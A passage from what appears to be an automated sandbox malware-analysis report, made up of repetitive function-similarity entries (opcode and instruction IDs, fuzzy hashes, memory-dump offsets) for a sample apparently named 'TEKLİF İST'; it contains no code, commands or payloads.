                                                                                                              • API ID:
                                                                                                              • String ID: .mui
                                                                                                              • API String ID: 0-1199573805
                                                                                                              • Opcode ID: beba26871695c6e87384cdeeb6a9ed709dbb6b86067968d70c087419661bc7d6
                                                                                                              • Instruction ID: 06b12b5771a8a05c762240c1ed07fc7d29e528338604785b7e64c3835cfd79b8
                                                                                                              • Opcode Fuzzy Hash: beba26871695c6e87384cdeeb6a9ed709dbb6b86067968d70c087419661bc7d6
                                                                                                              • Instruction Fuzzy Hash: 3A5172B2D012299BDF18DFA9D844AAEBBF5EF15710F0541ADEA11FB350D7349801CBA4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: EXT-
                                                                                                              • API String ID: 0-1948896318
                                                                                                              • Opcode ID: ef3bdb173028c830cce401c15c64c168204cdf4c93702acb3e8f9e8e60c45d91
                                                                                                              • Instruction ID: ca13e851fa7512b25834537e92530553f37dba72f82a08fe68bbe2ef24b40c83
                                                                                                              • Opcode Fuzzy Hash: ef3bdb173028c830cce401c15c64c168204cdf4c93702acb3e8f9e8e60c45d91
                                                                                                              • Instruction Fuzzy Hash: 434182725083029BDB69DB75D840B6BF7D8EF88714F440AADFA84D7140E774DA04C796
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: BinaryHash
                                                                                                              • API String ID: 0-2202222882
                                                                                                              • Opcode ID: 63a6132414a82cc18dac7c203fb2ed61b018171386bcbec0275fb345f0400fa1
                                                                                                              • Instruction ID: 4cfcf7eacd71ca643519f75bf39b6741d7c8dfa038aa2d346cd483be6230a398
                                                                                                              • Opcode Fuzzy Hash: 63a6132414a82cc18dac7c203fb2ed61b018171386bcbec0275fb345f0400fa1
                                                                                                              • Instruction Fuzzy Hash: 324143B1D0012DABDF25DA60DC84FEEBB7CAB54714F0045E5EA08AB140DB709E89CFA4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: #
                                                                                                              • API String ID: 0-1885708031
                                                                                                              • Opcode ID: 425b0b5b5f13a8cb997fc68118c1db3dc0f0376359eb36cf5faf5ebe97a00a1c
                                                                                                              • Instruction ID: cf2610a7d2c248d0e24cabac1eba38fdf6c2701b2134a89caa566489675db59f
                                                                                                              • Opcode Fuzzy Hash: 425b0b5b5f13a8cb997fc68118c1db3dc0f0376359eb36cf5faf5ebe97a00a1c
                                                                                                              • Instruction Fuzzy Hash: C7310831A007599BEB2EDF69C850BEE7BA8DF04704F1840A8E941AB282E775E805CB50
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: BinaryName
                                                                                                              • API String ID: 0-215506332
                                                                                                              • Opcode ID: ecae0b1f62cb0562ba91cf23200d28d485d991ba9c1a89518eadfb5677748290
                                                                                                              • Instruction ID: 65e9dd5f80708432aa74f17f5af3aa27947f63453d56cea4c86cef75fbcedae2
                                                                                                              • Opcode Fuzzy Hash: ecae0b1f62cb0562ba91cf23200d28d485d991ba9c1a89518eadfb5677748290
                                                                                                              • Instruction Fuzzy Hash: 7A31F436900519AFEF2DDB58C895EBFBFB4EB80710F0141A9A905E7650D7709E04DBE0
                                                                                                              Strings
                                                                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01BC895E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                              • API String ID: 0-702105204
                                                                                                              • Opcode ID: 92231e35df14fc318275c1ae248eaac8fc2fd0771e426c9066eb8abb289efdf7
                                                                                                              • Instruction ID: 098fab7dce2dfc4a0b839267b3a73458d4576621828f0e28dd7e3d5a5d3f3680
                                                                                                              • Opcode Fuzzy Hash: 92231e35df14fc318275c1ae248eaac8fc2fd0771e426c9066eb8abb289efdf7
                                                                                                              • Instruction Fuzzy Hash: E3012B713002019FEA3C6B59DC84BD67B65EFD1B54B0421ACF64216561CBA1E840C7A6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 711d9fbb583ff9cd2e61c6a2748e44be1a2d0aa5ab8e269ff87c1823a734793c
                                                                                                              • Instruction ID: a519981003544c0c10458967430fcd0da4d4064606937e5d3678e299074f7d58
                                                                                                              • Opcode Fuzzy Hash: 711d9fbb583ff9cd2e61c6a2748e44be1a2d0aa5ab8e269ff87c1823a734793c
                                                                                                              • Instruction Fuzzy Hash: 1742B4716083418BEB2DCF69C894A6BBBE9FF84700F0809EDFA8297250D775D945CB52
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0cd3b179b32de3eb29605ec76129184f104b723e23f1b9e8140514a5f7a5984c
                                                                                                              • Instruction ID: 8f241c923b024749e3c92b278b649cb18f382df4cd627f0c2e7d9360d6d18c2b
                                                                                                              • Opcode Fuzzy Hash: 0cd3b179b32de3eb29605ec76129184f104b723e23f1b9e8140514a5f7a5984c
                                                                                                              • Instruction Fuzzy Hash: 31425C75A002198FEB29CF69C881BADBBF5FF48311F1581D9E949EB241EB349981CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 736d47bbf4368ed06d495268759128501445e7b0f6642068cf12a42f757c9bc1
                                                                                                              • Instruction ID: 2726ebad00125a08928b82058e8890bf5f31f63c3791821b2be8f6f7e850c1c6
                                                                                                              • Opcode Fuzzy Hash: 736d47bbf4368ed06d495268759128501445e7b0f6642068cf12a42f757c9bc1
                                                                                                              • Instruction Fuzzy Hash: 8B32D0B0A087558BDB2DCF69C8447BEBBF2FF84704F58419EE9869B285D735A801CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e8269d2d2045963c5b3d90555082b38c89561a5589218f533ec2300676f4d7fd
                                                                                                              • Instruction ID: 3a0d2a4fda1149e82175e03ab2441fcc8f738e973027c5270d52374b0ec16573
                                                                                                              • Opcode Fuzzy Hash: e8269d2d2045963c5b3d90555082b38c89561a5589218f533ec2300676f4d7fd
                                                                                                              • Instruction Fuzzy Hash: 0222AD742046618FEB29CF39C098372BBF9EF45340F0885DAE9968F286D735E452DB61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b0ff3e98eeb09db7d292f24068eaa3cf9412f25e5d92511963f1b18f0fde6620
                                                                                                              • Instruction ID: 5a957440aeebceb3c64ed0817e19d44e6d9780ca861c80e036529fb5d25d0275
                                                                                                              • Opcode Fuzzy Hash: b0ff3e98eeb09db7d292f24068eaa3cf9412f25e5d92511963f1b18f0fde6620
                                                                                                              • Instruction Fuzzy Hash: 2D225C70E0421ADBCF19CF99C4809BEFBF6FF58704B54859AE9459B241E738D941CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 175ee93a4a494d81c79cee43dd3940989613bb35edcea67bb2a5c64652e459fc
                                                                                                              • Instruction ID: f904b8b88d18a7b2c078c693190d4d51b9aa2a4a4ac1dbe1da6bff409a993da9
                                                                                                              • Opcode Fuzzy Hash: 175ee93a4a494d81c79cee43dd3940989613bb35edcea67bb2a5c64652e459fc
                                                                                                              • Instruction Fuzzy Hash: E2329B71A05205DFDB69CF6CC480BAABBF1FF49300F1486A9E956AB391DB34E841DB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                              • Instruction ID: b0f0f9a9b5ef1e420dfa9372fa189e238897c0cbd973a960b18765131fdf7af0
                                                                                                              • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                              • Instruction Fuzzy Hash: DEF16E71E0060A9BDF19CF99D580BAEBBF9EF58710F0881A9E915AB344E778DC41CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d10e1dce003e6c12d73771cd8c540e977b4a16cf19129164e7dd204853e52119
                                                                                                              • Instruction ID: 4532c487c8bfcd3851fc86925bab28eedb0eae5a604c8c8ec88b6b646e8f19b8
                                                                                                              • Opcode Fuzzy Hash: d10e1dce003e6c12d73771cd8c540e977b4a16cf19129164e7dd204853e52119
                                                                                                              • Instruction Fuzzy Hash: 58D1F171A0060A9BDF0DCF69C841BBEBBF1EF88306F1981A9D955E7241E735E905CB60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 854ea0dae7c7c029824a7e3188704009c7ff679d0df9d94d2c08813a0721e784
                                                                                                              • Instruction ID: f1f6ac9a227131de434627185a0f5cde4c866f3aad747a7a99c2cad38f49b7fa
                                                                                                              • Opcode Fuzzy Hash: 854ea0dae7c7c029824a7e3188704009c7ff679d0df9d94d2c08813a0721e784
                                                                                                              • Instruction Fuzzy Hash: ABE17E75508342CFC719CF28C490A6ABBE0FF8A314F058AADF99587351EB31E905DB92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bccc60d8ee0c78abbc7a26f15eab903b14985691af5d12418052980b2a85af76
                                                                                                              • Instruction ID: 667190d723df0582425cddfbdebf55e3cc20be64a7815a6e28c0a1370c63b772
                                                                                                              • Opcode Fuzzy Hash: bccc60d8ee0c78abbc7a26f15eab903b14985691af5d12418052980b2a85af76
                                                                                                              • Instruction Fuzzy Hash: 7CD1CF71A00206DBDF1DDF68D990EBAB7A5FF94204F0543A9F916DB280E730E961CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                              • Instruction ID: 44aa9fae886cf60b97ff1a5a1e33500ec13862b7f8498f51412e70031d2e3584
                                                                                                              • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                              • Instruction Fuzzy Hash: 5FB16774A006059FDF28DF99C944EAFBBBAFF84704F14449EAA429B790DB74E905CB10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                              • Instruction ID: e9a36449193240df190974455ac83b24fec459c797d54fc77c0bc79057511ef9
                                                                                                              • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                              • Instruction Fuzzy Hash: 94B1F731604646AFDF2DEB68C890BBEBBF6EF44304F1805D9EA5697281D770D941CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 15e132b2a17a2407feb085a8c5902d0efc5638ef2ca2fdd091e3cb1c729f0492
                                                                                                              • Instruction ID: ea4d37c10aa663edeb093ed81dbdb231c126f304b3c8abac7780a49390ec1f93
                                                                                                              • Opcode Fuzzy Hash: 15e132b2a17a2407feb085a8c5902d0efc5638ef2ca2fdd091e3cb1c729f0492
                                                                                                              • Instruction Fuzzy Hash: 9CC158745083418FD768CF59C494BAAB7E5FF88304F4489ADE9898B291E774E908CF92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a44afdb3189ad9cf68b59ca72f391d706ec0441dd1106f0c7f1cf0f10407cc67
                                                                                                              • Instruction ID: 26ad678e9476f9ee12c1f26956fd03c7d2590558a67d5a2883a7563d10d0daef
                                                                                                              • Opcode Fuzzy Hash: a44afdb3189ad9cf68b59ca72f391d706ec0441dd1106f0c7f1cf0f10407cc67
                                                                                                              • Instruction Fuzzy Hash: 0CB18670A002658BDB79DF68C890BA9B7F5EF84700F1585EAD50AE7291DB30DD86CF20
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 18c3c0c48da5ccf1d9d75409a547ee6dbb099e78d71d11a964c12d6640f570cf
                                                                                                              • Instruction ID: 97a605f0ac90b42af39c61b83b26bd750c6f0997538d87904f62f80eb895ae25
                                                                                                              • Opcode Fuzzy Hash: 18c3c0c48da5ccf1d9d75409a547ee6dbb099e78d71d11a964c12d6640f570cf
                                                                                                              • Instruction Fuzzy Hash: 89A10735E04615AFEF29DB58C844BFDBBB8EB10754F0502E9EA01AB291D778DD40CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d046ea72a1d09e7f18fc15ae63decaa2bb0b03251b841e9a73832ce62725f865
                                                                                                              • Instruction ID: 6bbf23a0146802c487b1ac2997ca8dc69b9557dae612601f797a838a98a2fd8e
                                                                                                              • Opcode Fuzzy Hash: d046ea72a1d09e7f18fc15ae63decaa2bb0b03251b841e9a73832ce62725f865
                                                                                                              • Instruction Fuzzy Hash: BFA1F270B006169FDB2CEF69C990BBAB7B1FF54754F0441A9FA0697281EB74E805CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c3e914da5a19e7acd103f7bf4ba41b659d411d73f6b60caac378588de9c568f0
                                                                                                              • Instruction ID: 90710aaee2fcd85ad308eab1a7d2d8b4e4985c454373c650c7388432ca7fb1f7
                                                                                                              • Opcode Fuzzy Hash: c3e914da5a19e7acd103f7bf4ba41b659d411d73f6b60caac378588de9c568f0
                                                                                                              • Instruction Fuzzy Hash: 20A1F072A40212EFDB2ADF18C980B1ABBE9FF49744F040968F945DB654C330EE01DB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d9e8fba988ecfba6e6dadd16e40320fb76aa145684cc46c40469b7766083b3dd
                                                                                                              • Instruction ID: cf7b694150e620aabdf02158d115e5fbcfa4f739cb119c02b274baddc115d2da
                                                                                                              • Opcode Fuzzy Hash: d9e8fba988ecfba6e6dadd16e40320fb76aa145684cc46c40469b7766083b3dd
                                                                                                              • Instruction Fuzzy Hash: D6916271E00216AFDF19CFA9D894FAEBBB5EB48B10F1541ADE610EB351D734D9009BA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 957e230d566f7210adcea259a951a59d6e3f277dcef6b972bd0187de458fdc17
                                                                                                              • Instruction ID: 602365a2b66fabd219348d505e8f49efe57f1dbf9fb3d3718fa77ad5b0725c7d
                                                                                                              • Opcode Fuzzy Hash: 957e230d566f7210adcea259a951a59d6e3f277dcef6b972bd0187de458fdc17
                                                                                                              • Instruction Fuzzy Hash: A1912731A00616DBEB6DDB68D480B7EBBB2EF94758F0541EAED059B340E734DA01C761
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8d96e6e081dc5b23a5f44bb28448b60ee37386b5b8e68f9cb502e501332bf649
                                                                                                              • Instruction ID: 2f2f222cc4642e45c5449c9f8f20c4b9f4e9b18fa6633bb2b8e91bd3b86372d5
                                                                                                              • Opcode Fuzzy Hash: 8d96e6e081dc5b23a5f44bb28448b60ee37386b5b8e68f9cb502e501332bf649
                                                                                                              • Instruction Fuzzy Hash: 8D819071A0061A9BDF28CF69C940ABEBBF9FB48700F14857EE455D7640E734D941CBA4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                              • Instruction ID: 69655d1b4c0cbe02efe7afcb8e2d499c0fcd19fa5b5049b594b94832db29330a
                                                                                                              • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                              • Instruction Fuzzy Hash: AC818071A10705DFDF1ACF99C490AAEBBF2BF84310F198569D9169B384DB34EA01CB40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1cfb2e4438642e9d9e36642f6e26136a96f0a431c914da6a6c64094c8a831c0f
                                                                                                              • Instruction ID: 6ec85429ea04796ac6f12e87bf40a4743894ad9f6132e68542544c9346b53e61
                                                                                                              • Opcode Fuzzy Hash: 1cfb2e4438642e9d9e36642f6e26136a96f0a431c914da6a6c64094c8a831c0f
                                                                                                              • Instruction Fuzzy Hash: 84818F71A00609AFDB2ADFA8C880BEEBBF9FF48314F1044A9E555A7250D770EC05DB60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                              • Instruction ID: 33b61d82bebedae27adacea6922b2cbd500d7fde64c5dfdbf14fe1b613cf5ee2
                                                                                                              • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                              • Instruction Fuzzy Hash: DA515735E002199FCB19CFA9C5C0AAEF7B2FF84710F2481A9D915A7751D7B4AE42CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 84bceb4e75646ca2428b6864633d5ba199a5d6b7caeef5b7e35e4e0d94e7728f
                                                                                                              • Instruction ID: a78972fe6b4e47a20563f19cc5124dca19546404d8f780f29d9e2c8c38b185ce
                                                                                                              • Opcode Fuzzy Hash: 84bceb4e75646ca2428b6864633d5ba199a5d6b7caeef5b7e35e4e0d94e7728f
                                                                                                              • Instruction Fuzzy Hash: 1F51D570904216EBDF2DDF68CC00BA8BBB1EF16314F1482E9E529A72D1E7349981DF81
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d40fd6fad13700e781f7e6c5ee8fe86027fb72de203a7fb3d18af498fbfae322
                                                                                                              • Instruction ID: 0af9746c9fc0d69425d11991cd33f917f168074b55281c4cc93748ef3d0dbc2b
                                                                                                              • Opcode Fuzzy Hash: d40fd6fad13700e781f7e6c5ee8fe86027fb72de203a7fb3d18af498fbfae322
                                                                                                              • Instruction Fuzzy Hash: 23418131A00229DBDF29EF68C940BEA77B8EF55740F0140E5EA09AB242D774DE81CB95
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                              • Instruction ID: 263e013e3c8f785956663fa4f591f66390493ca536dc66531208cf4c2769aa09
